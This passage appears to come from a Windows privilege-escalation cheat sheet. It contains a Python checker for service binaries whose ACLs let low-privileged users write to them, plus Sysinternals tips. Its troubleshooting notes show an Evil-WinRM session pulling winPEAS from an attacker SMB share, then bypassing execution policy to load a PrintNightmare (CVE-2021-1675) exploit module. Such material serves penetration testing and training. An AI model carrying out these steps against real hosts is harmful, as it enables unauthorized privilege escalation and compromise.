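    r"nt authority\interactive",
}
# Rights that allow changing the file: F/M/W from the legend above, plus the
# specific rights write-data, append-data, write-attributes, write-DAC, write-owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WDAC", "WO"}
# Inheritance flags icacls prints in their own parentheses; not permissions.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# principal:(flag)(flag)(rights) with the groups running to end of line
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<groups>(?:\([^)]*\))+)\s*$")

# Constructed sample: `icacls "C:\Program Files\Serviio\bin\ServiioService.exe"`
SAMPLE_PATH = r"C:\Program Files\Serviio\bin\ServiioService.exe"
SAMPLE_ICACLS = r"""C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
                                                NT AUTHORITY\SYSTEM:(I)(F)
                                                BUILTIN\Administrators:(I)(F)
                                                NT AUTHORITY\Authenticated Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(output, path):
    """Parse `icacls <path>` output into [(principal, {rights}), ...].

    icacls prints the path followed by the first ACE on one line, then one ACE
    per indented line, so the path is stripped from the first line.
    """
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("groups")):
            for token in group.split(","):
                token = token.strip()
                if token and token not in INHERIT_FLAGS:
                    rights.add(token)
        aces.append((m.group("principal").strip(), rights))
    return aces


def weak_binary_acl(output, path):
    """ACEs giving a low-privileged principal write access: [(principal, [rights])]."""
    findings = []
    for principal, rights in parse_icacls(output, path):
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((principal, sorted(rights & WRITE_RIGHTS)))
    return findings


if __name__ == "__main__":
    for principal, rights in weak_binary_acl(SAMPLE_ICACLS, SAMPLE_PATH):
        print(f"{SAMPLE_PATH}: {principal} has {','.join(rights)}")
```

Save the output with `icacls "<binary>" > acl.txt` and call `weak_binary_acl(open("acl.txt").read(), "<binary>")`; the same parser works on the service's directory, where a writable parent folder matters just as much as the binary itself.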


Sysinternal tools


The sigcheck utility from Sysinternals allows inspection of the application manifest, an XML file containing information that lets the operating system know how to handle the program when it is started.

# -a argument to obtain extended information and -m to dump the manifest.
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

We can use Process Monitor from the Sysinternals suite to gather more information about this tool as it executes.

procmon.exe

Troubleshoot


‘whoami’ is not recognized as an internal or external command

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

Troubleshoot powershell


*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> copy \\10.10.16.20\kali\winPEAS.bat win.bat
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> .\win.bat
Program 'win.bat' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\win.bat
+ ~~~~~~~~~.
At line:1 char:1
+ .\win.bat
+ ~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> 
C:\Windows\temp> Import-Module .\CVE-2021-1675.ps1
File C:\Windows\temp\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
C:\Windows\temp> Get-ExecutionPolicy
Restricted
C:\Windows\temp> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
C:\Windows\temp> Get-ExecutionPolicy
Unrestricted
C:\Windows\temp> Import-Module .\CVE-2021-1675.ps1
C:\Windows\temp>